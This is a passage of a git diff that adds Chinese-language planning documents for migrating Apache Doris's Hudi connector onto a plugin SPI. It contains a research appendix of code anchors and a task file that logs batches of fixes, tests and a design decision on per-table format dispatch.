catalog 端到端/集群验证 +``` + +**最短关键路径**(让单 hms catalog 多格式"先能跑通"):**T08 设计(M1+M2 选型) → M1 fe-core 消费 tableFormatType → M2 router → M4 hms 内 Hudi 路径 →(Iceberg 需 M3 先行)→ M6 翻闸**。其中 **M1+M2 是真正的 keystone**:没有它,per-table 探测的成果无法兑现。 + +--- + +## 10. 开放问题(留给 T08 设计 / 后续决策) + +1. **M2 选型**:(A) 连接器内 router / (B) `ConnectorMetadata.getScanPlanProvider(handle)` per-table / (C) fe-core 发现期分派——哪条?(§8) +2. **Iceberg 归属**:hms 里的 Iceberg 表是由 hms 连接器委托 `IcebergConnectorMetadata`,还是 fe-core 仍回落 legacy `IcebergScanNode`?Iceberg 不依赖 hms(用 SDK),跨界委托如何拼装? +3. **Hudi time-travel/增量**:`planScan` 只读最新快照(`HudiScanPlanProvider.java:100-108`),`visitPhysicalHudiScan` 对 `AS OF`/增量已 fail-loud(P3-T04)。snapshot/timestamp 如何经 SPI 传入 `planScan`?(批 E) +4. **连接器生命周期**:catalog 创建期 + `initLocalObjectsImpl` 期各创建一次 connector(`PluginDrivenExternalCatalog.java:87-145`)——首个是否被丢弃?`HmsClient` 是否重复建(池泄漏风险)? +5. **`tableFormatType` 去留**:它是面向未来 per-table 分派的前瞻字段(应被 M1 消费),不是技术债——T08 须明确其消费契约。 +6. **fe-core ↔ SPI 探测 drift**:`HMSExternalTable.makeSureInitialized` 与 `HiveTableFormatDetector` 两份逻辑,长期是否抽共享(M5)以防漂移? + +--- + +## 附录 A:核心 file:line 锚点索引 + +**Legacy 模型** +- `fe-core/.../datasource/hive/HMSExternalCatalog.java:52-106` +- `fe-core/.../datasource/hive/HMSExternalTable.java:208-210`(DLAType) `:250-307`(探测) `:226-240`(cache 分派) `:384-408`(schema 分派) +- `fe-core/.../datasource/hive/{Hive,Hudi,Iceberg}DlaTable.java` / `HMSDlaTable.java:36-87` +- `fe-core/.../nereids/glue/translator/PhysicalPlanTranslator.java:~724-770`(scan 分派) `:819`(visitPhysicalHudiScan) + +**SPI catalog / gate / 框架** +- `fe-core/.../datasource/CatalogFactory.java:52`(SPI_READY_TYPES) `:71-184`(createCatalog) +- `fe-core/.../connector/ConnectorFactory.java:53-75` / `ConnectorPluginManager.java:74-144` +- `fe-core/.../datasource/PluginDrivenExternalCatalog.java:57-145` / `PluginDrivenExternalTable.java:79-109`(❗不读 tableFormatType) / `PluginDrivenScanNode.java:85-100,356-395` + +**SPI 接口** +- `fe-connector-api/.../Connector.java:34-121` / `ConnectorMetadata.java:37-44` / `ConnectorTableSchema.java:29-92` +- `fe-connector-api/.../scan/ConnectorScanPlanProvider.java:38-196` / `ConnectorScanRange.java:96-98` +- `fe-connector-spi/.../ConnectorProvider.java:40-98` + +**连接器实现** +- hive: `HiveConnectorProvider.java:32-43`(type="hms") / `HiveConnector.java:54-73` / `HiveConnectorMetadata.java:105-131,134-154,282-294,193-234` / `HiveTableFormatDetector.java:77-100` / `HiveTableType.java:28-41` / `HiveTableHandle.java:35-196` / `HiveScanPlanProvider.java:95-132` / `HiveScanRange.java:120-122,195` +- hudi: `HudiConnectorProvider.java:36`(type="hudi") / `HudiConnector.java:46-110` / `HudiConnectorMetadata.java:69-214` / `HudiScanPlanProvider.java:85-162` / `HudiScanRange.java:140-142` +- iceberg: `IcebergConnectorProvider.java:34-45`(type="iceberg") / `IcebergConnector.java:51-150`(无 scan provider) / `IcebergConnectorMetadata.java:57-167`(metadata-only) +- hms: `fe-connector-hms/.../HmsClient.java:40-78` + +**护栏 / 项目文档** +- `tools/check-connector-imports.sh:30-60` +- `plan-doc/deviations-log.md`(DV-005) / `plan-doc/decisions-log.md`(D-019) / `plan-doc/tasks/P3-hudi-migration.md`(T08 批 D) + +--- + +## 附录 B:调研方法与可信度 + +- 6 个 read-only `Explore` agent 并行(areas:legacy-model / spi-catalog-gate / connector-providers / format-dispatch / scan-split-path / module-deps-reuse),合计读 ~286 次工具调用、~469K token;结论经 6 reader 交叉印证(§0 三断点、gate、依赖图均多 reader 一致)。 +- **可信度高的结论**:`tableFormatType` 产而不用、scan 硬编码 `"hive"`、Iceberg 无 ScanPlanProvider、依赖图、type 注册(hms/hudi/iceberg)、gate 内容——多 reader + 主线核读一致。 +- **行号为近似锚点**:个别文件不同 reader 报的行段略有出入(如 `PhysicalPlanTranslator` ~724-795),已取交集并标"~"。落地修改前应按附录 A 重新精确定位。 +- **本调研未运行构建/测试**(纯静态阅读);未改动任何代码或现有文档。 +``` diff --git a/plan-doc/tasks/P3-hudi-migration.md b/plan-doc/tasks/P3-hudi-migration.md new file mode 100644 index 00000000000000..a8c7c0ae100038 --- /dev/null +++ b/plan-doc/tasks/P3-hudi-migration.md @@ -0,0 +1,147 @@ +# P3 — hudi 迁移 + +> 阶段总览见 [00-master-plan §3.4](../00-connector-migration-master-plan.md)。 +> 协作规范见 [AGENT-PLAYBOOK.md](../AGENT-PLAYBOOK.md)。 +> 连接器看板:[connectors/hudi.md](../connectors/hudi.md)。 +> 关键前情:[DV-005](../deviations-log.md)(依赖假设更正)、[D-019](../decisions-log.md)(hybrid 策略)、[HANDOFF 关键认知 1 / 1b](../HANDOFF.md)。 + +--- + +## 元信息 + +- **状态**:🚧 进行中(批 0 ✅;批 A 编码完成 T02 ✅/T04 ✅/T03→批 E;批 B 编码完成 T05 ✅/T06 决策 ✅([DV-007]);批 C 编码完成 T07 三模块测试基线 + COW/MOR schema parity ✅([DV-008]);**批 D 设计完成**:T08 `tableFormatType` 分流消费设计备忘 ✅([D-020],M2=方案 B per-table SPI provider,design-only)。**批 A–D(P3 hybrid 全部 in-scope)完成**,剩批 E(deferred,并入 P7/hive·HMS migration)) +- **启动日期**:2026-06-04 +- **目标完成**:—(hybrid 范围,估时按批 A–C 约 1–1.5 周;批 D 设计 0.5 周;批 E deferred 不计入 P3) +- **实际完成**:— +- **阻塞**:无(P0 ✅ / P1 ✅ / P2 ✅ 已合入 #64096) +- **阻塞下游**:批 E(live cutover)与 P7 hive/HMS migration 合并;P3 批 A–D 不阻塞任何下游 +- **主 owner**:@me +- **分支**:`catalog-spi-04`(从 `branch-catalog-spi` 切);**PR [#64143](https://github.com/apache/doris/pull/64143)**(base `apache/doris:branch-catalog-spi`,2026-06-05 开,26 files +3065/−154、12 commits) + +--- + +## 策略:hybrid(D-019) + +两轮 code-grounded recon(+ 对抗验证)的结论(详见 [DV-005](../deviations-log.md) / HANDOFF 关键认知 1+1b): + +- HMS-over-SPI **读码已存在但 dormant**(`fe-connector-hms` 客户端库 + `HiveConnectorMetadata`(type `"hms"`) + `HudiConnectorMetadata`(type `"hudi"`),gate 关闭、零 live caller)。 +- scan/split **plumbing 正确**:单 `PluginDrivenScanNode` 能混合 COW-native + MOR-JNI(per-range format,BE 每 range 建 reader),与 legacy `HudiScanNode` 结构等价 —— **混合格式不是问题**。 +- **真正阻塞 = catalog 模型错配 + gate**(架构级);另有一批**与模型无关**的 SPI-surface 正确性缺口。 + +**hybrid = 现在做 (b),推迟 (a)**: + +- **(b) 现在做(批 A–D,全部 behind 关闭的 gate,零 live-path 风险)**:把 dormant 的 hudi 连接器**硬化到正确性 parity** + 补 metadata 缺口 + 建**测试基线** + 出**模型 dispatch 设计**。这些都与最终选哪种模型无关,且无论如何都要做。 +- **(a) 推迟(批 E,登记不编码)**:fe-core 消费 `tableFormatType` 的 per-table 分流、gate flip(`SPI_READY_TYPES` 加 hms/hudi)、live 路径 cutover、删 legacy `datasource/hudi/`、完整增量/time-travel、集群/runtime 验证 —— 并入一个 **properly-scoped hive/HMS migration**(P7 或专门子阶段),避免把 P7 范围与 live 重度 HMS 路径风险压进 P3。 + +> ⚠️ **P3(hybrid)不交付用户可见行为变化**:hudi 查询仍走 legacy 路径(gate 不翻)。P3 的产出是**连接器硬化 + 测试网 + 设计**,为后续 live cutover 扫清正确性障碍。批 A–C 的验证是**单测 + 设计级**;端到端/集群验证随批 E cutover 一起做(recon 的 open questions 见关联)。 + +--- + +## 验收标准 + +- [x] **批 A / T02**:`column_types` 双 bug 修复(发完整 Hive 类型串 + 弃逗号 join/split)✅(`95f23e9`) +- [x] **批 A / T04**:time-travel / 增量读 **fail-loud**(不静默返最新 / 不静默全扫)✅(`feceabb`,单测推迟批 E) +- [~] **批 A→E / T03**:native split `schema_id` + `params.history_schema_info` 填充 —— **推迟批 E([DV-006])**,非 model-agnostic SPI 修复(连接器缺 field-id/InternalSchema/type→thrift;裸基线净回归) +- [x] **批 B / T05**:真实 `applyFilter` EQ/IN 约束裁剪 ✅(`10b72d4`,镜像 Hive);`listPartitions*` override **推迟批 E**([DV-007],零 live caller、Hive 不 override) +- [x] **批 B / T06**:MVCC/snapshot SPI **保持 default opt-out + 文档化** ✅([DV-007],非抛异常 override——破 opt-out 约定/不可达;T04 已 fail-loud time-travel);完整 MVCC 入批 E +- [x] **批 C / T07**:fe-connector-hms/hive/hudi 测试基线 ✅(hms 12 + hive 14 + hudi +18=33 全绿,golden-value);**parity 测试** ✅——COW/MOR schema **type-agnostic**(差异只在 scan planning),SPI avro→column 变换 golden 对标 legacy `getHudiTableSchema`/`initHudiSchema`(列名/序/类型/Hive 串/casing)+ `detectHudiTableType` COW/MOR 分类。列名 casing 当场修([DV-008]);meta-field 纳入推迟批 E +- [x] **批 D / T08**:`tableFormatType` 分流消费设计备忘 ✅(design-only,零代码,**未动 fe-core live 路径**)——M1(fe-core opaque-串身份消费)⊥ M2(scan 路由)拆解;M2=**方案 B** per-table SPI provider([D-020],用户签字),细化 D-005;实现登记批 E/P7。设计:[`designs/P3-T08-tableformat-dispatch-design.md`](./designs/P3-T08-tableformat-dispatch-design.md) +- [ ] 全程 fe-connector 编译 + checkstyle 0 + import-gate 通过;新增单测全绿 +- [ ] gate 保持关闭(`SPI_READY_TYPES` 不含 hms/hudi);legacy `datasource/hudi/` 不删(批 A–D 内) +- [ ] 批 E 各项作为 deferred 明确登记,不在 P3 PR 内编码 +- [ ] 同步看板 + PROGRESS + connectors/hudi + +--- + +## 任务清单 + +> ID 永不复用。批次:批 0=recon/决策;批 A=scan 正确性;批 B=metadata 补全;批 C=测试;批 D=模型设计;批 E=deferred(登记)。 + +| ID | 任务 | 批次 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P3-T01 | 两轮 code-grounded recon + hybrid 决策(D-019)+ 本 task 文件 | 批 0 | @me | ✅ | — | 2026-06-04 | 2026-06-04 | recon #1(元数据)+ #2(scan/split)均含对抗验证;DV-005 记依赖更正;D-019 定 hybrid。锚点见 HANDOFF「P3 关键文件锚点」 | +| P3-T02 | `column_types` 双 bug 修复 + 单测 | 批 A | @me | ✅ | `95f23e9` | 2026-06-04 | 2026-06-04 | (a) `HudiScanPlanProvider` 弃 `ConnectorType.getTypeName()`(丢精度/scale/子类型),改发完整 Hive 类型串(对标 legacy `HudiUtils.convertAvroToHiveType`,如 `decimal(10,2)`/`struct<...>`);(b) `HudiScanRange` 停止 column_names/column_types/delta_logs 的逗号 join/split(含逗号的类型串会被打碎),改 typed list 端到端。**先读 BE `hudi_jni_reader.cpp` 确认 JNI scanner 期望的精确串格式**(names `,` / types `#`),再改。命中含 decimal/复杂列的 MOR-with-logs JNI split | +| P3-T03 | native split `schema_id` + `history_schema_info` 填充 + 单测 | ~~批 A~~→**批 E** | TBD | 🟡 推迟 | — | — | — | **[DV-006] 推迟批 E**:recon 实证非 model-agnostic SPI-surface 修复——连接器缺 field-id(`HudiColumnHandle` 无)/ Hudi `InternalSchema` 版本 / type→`TColumnType` thrift;「Paimon/ES 已 override」前提失真(其 override 为 predicate/docvalue,**不设** schema 元数据);裸 `current==file==-1`→BE `ConstNode`(identity-by-name,大小写敏感) **弱于**当前 `by_parquet_name` 名匹配 → **净回归**。faithful field-id evolution parity 需批 E 一次性建机制。批 A 保持现状名匹配(零回归) | +| P3-T04 | time-travel + 增量读 fail-loud 守卫 | 批 A | @me | ✅ | `feceabb` | 2026-06-05 | 2026-06-05 | `visitPhysicalHudiScan` SPI 分支加两守卫:`getIncrementalRelation().isPresent()` / `getTableSnapshot().isPresent()` → 抛 `AnalysisException`(不再静默返最新/全扫)。唯一同时可见 snapshot+incremental 的位置(SPI surface 拿不到 incremental)。删 dead `setQueryTableSnapshot`。dormant 分支 gate 关时不可达 → 零 live 风险。**单测推迟批 E**(dormant 不可 exercise;regression 断言 FOR TIME AS OF/增量→报错,precedent DV-003)。完整 snapshot 透传/增量 SPI/MVCC 入批 E | +| P3-T05 | 真实 `applyFilter` EQ/IN 分区裁剪 + 单测(`listPartitions*` override 推迟批 E)| 批 B | @me | ✅ | `10b72d4` | 2026-06-05 | 2026-06-05 | applyFilter 原是占位(列全部分区不裁剪 + 无条件设 `prunedPartitionPaths` → 静默把分区来源从 Hudi-metadata 切到 HMS)。重写为**忠实镜像 `HiveConnectorMetadata`**:抽取 partition 列 EQ/IN 谓词 → 列候选 → 裁剪 → 仅在有效果时回传 pruned handle,否则 `Optional.empty()`(handle 不变,回落 Hudi-metadata listing)。保留 `List` 路径表示 + `-1` 上限(不静默截断);7 helper duplicate from Hive(hudi 仅依赖 fe-connector-hms)。`HudiPartitionPruningTest` 8 测全绿、checkstyle 0、import-gate 通过。**`listPartitions*` override 推迟批 E**([DV-007]:零 live caller、Hive 不 override)。设计:[`designs/P3-T05-partition-pruning-design.md`](./designs/P3-T05-partition-pruning-design.md) | +| P3-T06 | MVCC/snapshot SPI:保持 default opt-out + 文档化(完整 MVCC→批 E)| 批 B | @me | ✅ | — | 2026-06-05 | 2026-06-05 | **决策([DV-007],用户签字「Keep defaults + document」)**:不 override `beginQuerySnapshot/getSnapshotAt/getSnapshotById`,保持 SPI default `Optional.empty()`(= opt-out)。recon 证「显式抛异常 override」错——破 SPI opt-out 约定(全体连接器含 Iceberg/Paimon/Hive/Trino 均依赖 default,`FakeConnectorPluginTest` 断言)、不可达死代码(MVCC 无 production caller)、且 T04 已在唯一可触发点(time-travel)fail-loud。**零代码**。完整 MVCC(`HudiMvccSnapshot`+snapshot 透传+增量时序)入批 E。设计:[`designs/P3-T06-mvcc-design.md`](./designs/P3-T06-mvcc-design.md) | +| P3-T07 | 三模块测试基线 + parity 测试 | 批 C | @me | ✅ | — | 2026-06-05 | 2026-06-05 | golden-value parity(无跨模块编译路径:fe-core 不依赖具体连接器模块)。**hudi**:`avroSchemaToColumns` 列名 `toLowerCase` 修(gap-1)+ package-private static;`HudiTypeMappingTest`+`fromAvroSchema` golden;新 `HudiSchemaParityTest`(列集合/序/类型/Hive 串/casing 边界)+ `HudiTableTypeTest`(COW/MOR/UNKNOWN)。**hms**:新 `HmsTypeMappingTest`(共享解析器)。**hive**:新 `HiveFileFormatTest`+`HiveConnectorMetadataPartitionPruningTest`(镜像 T05)。33 测全绿、checkstyle 0、import-gate 通过。COW/MOR schema **type-agnostic**。gap-2 meta-field→批 E([DV-008])。设计 [`designs/P3-T07-test-baseline-design.md`](./designs/P3-T07-test-baseline-design.md) | +| P3-T08 | `tableFormatType` 分流消费设计备忘(design-only) | 批 D | @me | ✅ | — | 2026-06-05 | 2026-06-05 | 设计备忘落地(零代码,未动 fe-core)。核心拆解 **M1 身份消费 ⊥ M2 scan 路由**(M1 三方案通用)。M2 三方案(A 连接器内 router / B per-table SPI provider / C fe-core 发现期分派)评估后用户签字 **方案 B**([D-020]):新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`,fe-core 优先 per-table、回落 per-catalog。**细化 D-005**(区分符沿用;"PhysicalXxxScan" 措辞早于 P1 统一,由 per-table provider seam 取代)。Iceberg-on-hms 依赖 P6/M3。实现登记批 E/P7。设计:[`designs/P3-T08-tableformat-dispatch-design.md`](./designs/P3-T08-tableformat-dispatch-design.md) | +| P3-T09 | [deferred] fe-core 消费 `tableFormatType` + hudi 表产出为 `PluginDrivenExternalTable` | 批 E | TBD | ⏳ | — | — | — | **不在 P3 hybrid 编码范围**;并入 hive/HMS migration(D-019)。catalog 模型落地 | +| P3-T10 | [deferred] gate flip(`SPI_READY_TYPES` 加 hms/hudi)+ live cutover + 删 legacy `datasource/hudi/` | 批 E | TBD | ⏳ | — | — | — | **不在 P3 hybrid 编码范围**。15 文件 ~2403 LOC + `HudiDlaTable`(在 hive/),live caller 仅 7 个 fe-core 文件。cutover 经验证后再删 | +| P3-T11 | [deferred] 集群/runtime 验证 + 完整增量/time-travel + image 兼容 | 批 E | TBD | ⏳ | — | — | — | **不在 P3 hybrid 编码范围**。混合格式 MOR regression、BE JNI parse parity、name-match 精确性、image 反序列化兼容(R-001) | + +**状态图例**:⏳ pending / 🚧 in_progress / ✅ done / ❌ blocked / 🚫 deleted + +--- + +## 阶段日志(倒序) + +### 2026-06-05(批 D:T08 ✅ `tableFormatType` 分流消费设计备忘,批 D 完成 = P3 hybrid in-scope 全完成) +- **P3-T08 ✅**(design-only,零代码,[D-020],用户签字 AskUserQuestion「M2=方案 B per-table SPI provider」): + - **直接输入** `research/spi-multi-format-hms-catalog-analysis.md`(上 session 6-reader recon);本场**不重复 recon**,只 firsthand 核读 load-bearing 锚点(避免按 research 的近似行号误设计):keystone gap 确认(`PluginDrivenExternalTable.initSchema:79-109` 只读 `getColumns()`、丢 `getTableFormatType()`);新增第二缺口(`getEngine:195-215`/`getEngineTableTypeName:217-231` switch catalog type 非 per-table format);`ConnectorScanPlanProvider.planScan:62-66` 入参带 per-table handle(三方案落脚前提);`ConnectorMetadata:37-44` 无 per-table provider(B 的新增点)。 + - **核心分析贡献**:把 keystone 拆成**可分离**两子问题——**M1 身份消费**(fe-core 读 `tableFormatType` 做 per-table 引擎名/身份,opaque 串、热路径不读)**⊥ M2 scan 路由**(单 hms connector 产 Hudi/Iceberg scan plan)。**M1 三方案通用**;A/B/C 只在 M2 分歧 → keystone 可控化。 + - **M2 决策 = 方案 B**([D-020]):新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`(默认 null→回落 per-catalog),fe-core `PluginDrivenScanNode.getSplits` 优先 per-table、回落 per-catalog;hms 网关按 `handle.getTableType()` 委派。把 per-table 选 provider 升为一等 SPI 契约,满足 D-009(default-only)。A(连接器内 router,零 SPI churn)列备选;C(fe-core 发现期分派)否决(违瘦 fe-core)。 + - **细化 D-005**(留痕,非偏差):tableFormatType 区分符沿用;"fe-core→PhysicalXxxScan"措辞早于 P1 scan-node 统一,由 per-table provider seam 取代。 + - **缩界(R12 不静默)**:本场零代码、gate 不动;Iceberg-on-hms 经 SPI 依赖 **P6/M3**(iceberg 现无 ScanPlanProvider、pom 未依赖 api),P6 前 ICEBERG 表回落 legacy 或 fail-loud(不误扫 Hive);探测共享化(M5)留 P7;M1+M2 实现登记批 E。设计:[`designs/P3-T08-tableformat-dispatch-design.md`](./designs/P3-T08-tableformat-dispatch-design.md)。 +- **批 D 小结**:T08 设计备忘落地 + D-020。**P3 hybrid 全部 in-scope(批 A–D)完成**:2 正确性修(T02/T05)+ 2 fail-loud/决策(T04/T06)+ 测试网零→59 测(T07)+ 模型 dispatch 设计(T08)。剩批 E(T03/T09–T11 + 各 deferred)并入 P7/hive·HMS migration,不在 P3 PR 编码。 + +### 2026-06-05(批 C:T07 ✅ 三模块测试基线 + COW/MOR schema parity,批 C 编码完成) +- **P3-T07 ✅**(测试 + gap-1 修,[DV-008],用户签字 AskUserQuestion「Also fix casing now」+「Focused baseline」): + - **feasibility(golden-value)**:fe-core 只依赖 `fe-connector-api`/`-spi`、**不依赖**具体连接器模块;连接器不依赖 fe-core;import-gate 只扫 `src/main`、只禁 connector→fe-core 单向 → **无跨模块编译路径同时见 legacy `HudiUtils` 与 SPI `HudiTypeMapping`**。parity 用 golden 值(注 legacy file:line),JUnit5 + 手写替身(无 mockito,`FakeHmsClient` 先例)。 + - **COW/MOR schema type-agnostic**(recon 关键结论):legacy `initHudiSchema` 与 SPI `getTableSchema`→`avroSchemaToColumns` 都从同一 avro schema 推导、**零表型分支**;COW/MOR 区别只在 scan planning(split 收集 + reader 格式)。→「COW & MOR 各一」= (a) avro→column 变换 golden(COW≡MOR 恒等)+ (b) `detectHudiTableType` 分类。 + - **gap-1 列名 casing 当场修**:`HudiConnectorMetadata.avroSchemaToColumns` 顶层列名改 `toLowerCase(Locale.ROOT)`,镜像 legacy `HMSExternalTable:745`(**仅顶层**;嵌套 struct 名两侧均保留);改 package-private `static` 可测(零行为变更)。已核安全(HMS 自身存小写标识符 → 与小写 HMS partition key 对齐,改善 `getColumnHandles` 匹配,无回归)。`ThriftHmsClient` 源头防御降字(与 hive 共享)缩界推 P7/批 E。 + - **gap-2 Hudi meta-field 纳入推迟批 E**([DV-008]):SPI 无参 `getTableAvroSchema()` vs legacy `(true)`,可能改变列集合;无真实 metaclient 不可单测,同 T03 族。 + - **测试**:**hudi**(+18)`HudiTypeMappingTest`+7(`fromAvroSchema`→ConnectorType golden,原零覆盖)/ 新 `HudiSchemaParityTest` 3(列名小写+序+ConnectorType+nullable+Hive 串,casing 边界 pin)/ 新 `HudiTableTypeTest` 4(COW/MOR/UNKNOWN)。**hms**(+12)新 `HmsTypeMappingTest`(共享 Hive 类型串解析器:嵌套 array/map/struct、decimal 精度/scale、char/varchar 长度、Options、大小写、`findNextNestedField`)。**hive**(+14)新 `HiveFileFormatTest` 6 + `HiveConnectorMetadataPartitionPruningTest` 8(镜像 `HudiPartitionPruningTest`,含 `getPartitions` 跳;consolidation 信号注 javadoc,P7 处理)。 + - 三模块 33 测全绿;checkstyle 0(含 test 源,`includeTestSourceDirectory=true`);import-gate 通过。gate 保持关闭,唯一 main 改动 = hudi `avroSchemaToColumns`(dormant、零 live 风险)。设计:[`designs/P3-T07-test-baseline-design.md`](./designs/P3-T07-test-baseline-design.md)。 +- **批 C 编码小结**:T07 测试网(三模块零→33 测)+ COW/MOR schema parity + gap-1 casing 修落地;gap-2 meta-field 登记批 E。**批 A+B+C 编码完成**,下一步批 D(T08 `tableFormatType` 分流设计备忘 design-only,不动 fe-core)。 + +### 2026-06-05(批 B:T05 ✅ 裁剪、T06 ✅ 决策,批 B 编码完成) +- **P3-T05 ✅**(commit `10b72d4`,feat):`HudiConnectorMetadata.applyFilter` 真实 EQ/IN 分区裁剪。 + - **根因**:原 applyFilter 是占位——对任何分区表 (a) 列**全部** HMS 分区名、忽略谓词,(b) 无条件设 `prunedPartitionPaths`。后果:无裁剪扫全分区;且无条件设 `prunedPartitionPaths` **短路** `HudiScanPlanProvider.resolvePartitions`(:287-289),把分区来源从 Hudi-metadata(`getAllPartitionPaths`)**静默切到 HMS**(仅对带 WHERE 的查询)——未声明的行为分叉。 + - **修复**:忠实镜像 `HiveConnectorMetadata.applyFilter`(7 步)——抽取 partition 列 EQ/IN 谓词(解析 `getExpression()`,`columnDomains` 在 fe-core 侧为空)→ 列候选 → `prunePartitionNames` 匹配 → 仅在 `matched.size() != all.size()`(真有效果)时回传 pruned handle,否则 `Optional.empty()`(handle 不变 → resolvePartitions 回落 Hudi-metadata listing,修复来源切换)。**保留 Hudi `List` 路径表示**(resolvePartitions 喂路径给 FileSystemView,非 HmsPartitionInfo)+ `-1` 上限(不静默截断,严格安全于 Hive 的 100000)。7 个 private helper duplicate from Hive(hudi 仅依赖 fe-connector-hms 非 -hive;P7 hive migration 时 consolidate,同 T02 `toHiveTypeString` 先例)。 + - **测试**:`HudiPartitionPruningTest` 8 测(EQ/IN/AND 裁剪、非分区谓词忽略、命中全部/0 分区、unpartitioned),手写 `HmsClient` 测试替身(接口 8 方法+close)。模块 19 测全绿;checkstyle 0;import-gate 通过。 + - **`listPartitions*` override 推迟批 E**([DV-007]):SPI 三方法零 live caller(`SHOW PARTITIONS` 等走 legacy metastore 路径,非 SPI)、Hive 基准不 override → 现 override = 不可测死代码。批 E(fe-core SPI 消费就绪)再做。 + - 设计:[`designs/P3-T05-partition-pruning-design.md`](./designs/P3-T05-partition-pruning-design.md)。gate 保持关闭,零 fe-core/BE/thrift/Hive 改动。 +- **P3-T06 ✅**(决策,零代码,[DV-007],用户签字 AskUserQuestion「Keep defaults + document」):MVCC/snapshot SPI **保持 default `Optional.empty()` opt-out**,不新增抛异常 override。recon(mvcc-t06 reader + grep fe-core)证「显式 unsupported override」错:① SPI 约定 default=opt-out(`FakeConnectorPluginTest` 断言);② 全体连接器(Iceberg/Paimon/Hive/Trino)无一 override;③ MVCC 方法无 production caller(仅测试 adapter)→ override 是死代码;④ T04 已在唯一可触发点(time-travel `visitPhysicalHudiScan`)抛 `AnalysisException`。正确「unsupported」=保持 default + T04 守卫。完整 MVCC 入批 E。设计:[`designs/P3-T06-mvcc-design.md`](./designs/P3-T06-mvcc-design.md)。 +- **批 B 编码小结**:T05(applyFilter 真实裁剪)✅ 落地 + T06(MVCC keep-defaults)✅ 决策。批 B 净产出 = 1 个正确性/性能修复(分区裁剪 + 修复来源切换,gate 后硬化,零回归)+ 1 个 code-grounded 决策(MVCC opt-out)。批 A+B 编码完成,下一步批 C(三模块测试基线 + COW/MOR parity)。 + +### 2026-06-05(批 A 续:T04 ✅,批 A 编码收尾) +- **P3-T04 ✅**(commit `feceabb`,feat):`PhysicalPlanTranslator.visitPhysicalHudiScan` SPI 分支加 fail-loud 守卫——`getIncrementalRelation().isPresent()` → 抛 `AnalysisException`(曾静默全扫);`getTableSnapshot().isPresent()` → 抛(曾静默返最新,因 `HudiScanPlanProvider` 永远用 `timeline.lastInstant()`)。该分支是**唯一**同时可见 snapshot + incrementalRelation 处(SPI surface 拿不到 incremental)。删 dead `setQueryTableSnapshot`。fe-core 编译 + checkstyle 0。**dormant 分支 gate 关时运行期不可达 → 零 live 风险**;**单测推迟批 E**(不可 exercise;批 E regression 断言 FOR TIME AS OF/增量→报错,precedent DV-003,R12 显式登记不静默跳过)。完整 snapshot 透传 + 增量 SPI 表示 + MVCC 入批 E(与 T06/T03/T09–T11 同批 E)。设计:[`designs/P3-T04-fail-loud-design.md`](./designs/P3-T04-fail-loud-design.md)。 +- **批 A 编码小结**:T02(column_types 双 bug)✅ + T04(fail-loud)✅ 落地;T03(schema_id/history)推迟批 E([DV-006],证非 model-agnostic SPI 修复)。批 A 净产出 = 2 个正确性修复(gate 后硬化,零回归)+ 1 个 code-grounded 推迟决策。 + +### 2026-06-05(批 A 续:T03 推迟决策) +- **P3-T03 🟡 推迟批 E**([DV-006],用户签字 AskUserQuestion「Defer T03 to batch E」):T03 启动前 4-reader code-grounded recon + 主线核读 BE `table_schema_change_helper.h:219-267` 揭示——schema_id/history **不是** 批 A 可做的 model-agnostic SPI-surface 修复: + - **连接器缺料**:`HudiColumnHandle` 无 field id;SPI 无 Hudi `InternalSchema` 版本跟踪;连接器模块无 type→`TColumnType` thrift 转换(legacy 在 fe-core `ExternalUtil`,import-gate 禁复用)。 + - **「Paimon/ES 已 override hook」前提失真**:二者 override `populateScanLevelParams` 为 predicate/docvalue,**不设** schema 元数据(无 SPI 先例)。 + - **裸基线净回归**:仅设 `current==file==-1` → BE 走 `ConstNode`(identity-by-name,大小写敏感),**弱于**当前 unset→`by_parquet_name`(鲁棒名匹配,处理大小写/缺列)。faithful field-id evolution parity 需批 E 与 hive/HMS migration 一次性建机制。 + - **批 A 动作**:不发 schema 元数据,保持现状名匹配(**零回归**),不 ship 裸 ConstNode。→ 直接进 **T04**。 + +### 2026-06-04(批 A 启动) +- **P3-T02 ✅**(commit `95f23e9`,feat):修 hudi JNI `column_types` 双 bug。 + - **(a)** `HudiScanPlanProvider` 原用 `HudiTypeMapping.fromAvroSchema(..).getTypeName()` 发 **Doris** 裸类型名(`DECIMALV3`/`STRUCT`,丢精度/scale/子类型);BE Hudi JNI scanner 期望 **Hive 类型串**。新增 `HudiTypeMapping.toHiveTypeString`(忠实复刻 legacy `HudiUtils.convertAvroToHiveType`,import-gate 禁止直接复用 fe-core)。`fromAvroSchema`(→Doris ConnectorType,服务 schema 上报)不动;删 dead `unwrapNullable`。 + - **(b)** `HudiScanRange` 原把 column_names/types/delta_logs 逗号 join 再 split,打碎含逗号的 Hive 类型串(`decimal(10,2)`/`struct`)并使 names↔types 错位。改为 typed `List` 字段直接设 thrift `list`;BE(`hudi_jni_reader.cpp`)自做 join(names `,` / types `#` / delta `,`),与 Java `HadoopHudiJniScanner` split 契约一致(两点 code-grounded 对抗确认)。 + - **测试**:建模块**首批**测试(`HudiTypeMappingTest` 9 + `HudiScanRangeTest` 2 = 11 全绿)。断言旧码会失败的行为(Rule 9):decimal 精度、struct/array/map 逗号存活、union unwrap、不支持类型 fail-loud、typed-list 对齐 + native 降级。 + - **守门**:fe-connector-hudi 编译 + checkstyle 0 + import-gate 通过;BUILD SUCCESS。**3 路对抗 review(parity / BE-contract / style+test)零确认缺陷**。 + - 设计备忘:[`designs/P3-T02-column-types-design.md`](./designs/P3-T02-column-types-design.md)。gate 保持关闭,零 fe-core/BE/thrift 改动。 + +### 2026-06-04(批 0) +- **批 0 完成**:两轮 recon(#1 元数据路径就绪 / #2 scan-split 路径,均 8/7-agent code-grounded workflow + 对抗验证)。结论改写原计划依赖假设 → 记 **DV-005**;用户定 **hybrid** 策略 → 记 **D-019**;建本 task 文件。 +- 关键结论:HMS-over-SPI 读码 dormant、scan plumbing 正确(混合格式非问题)、真阻塞=模型错配+gate;批 A–D 与模型无关,先做。 + +--- + +## 关联 + +- Master plan 章节:[§3.4 P3 hudi](../00-connector-migration-master-plan.md)、[§3.8 P7 hive+HMS](../00-connector-migration-master-plan.md)(批 E 并入处) +- RFC 章节:tableFormatType / DLA 模型(D-005 相关) +- 决策:[D-005](../decisions-log.md)(DLA 用 tableFormatType)、[D-019](../decisions-log.md)(hybrid 策略)、D-002(PluginDrivenScanNode extends FileQueryScanNode) +- 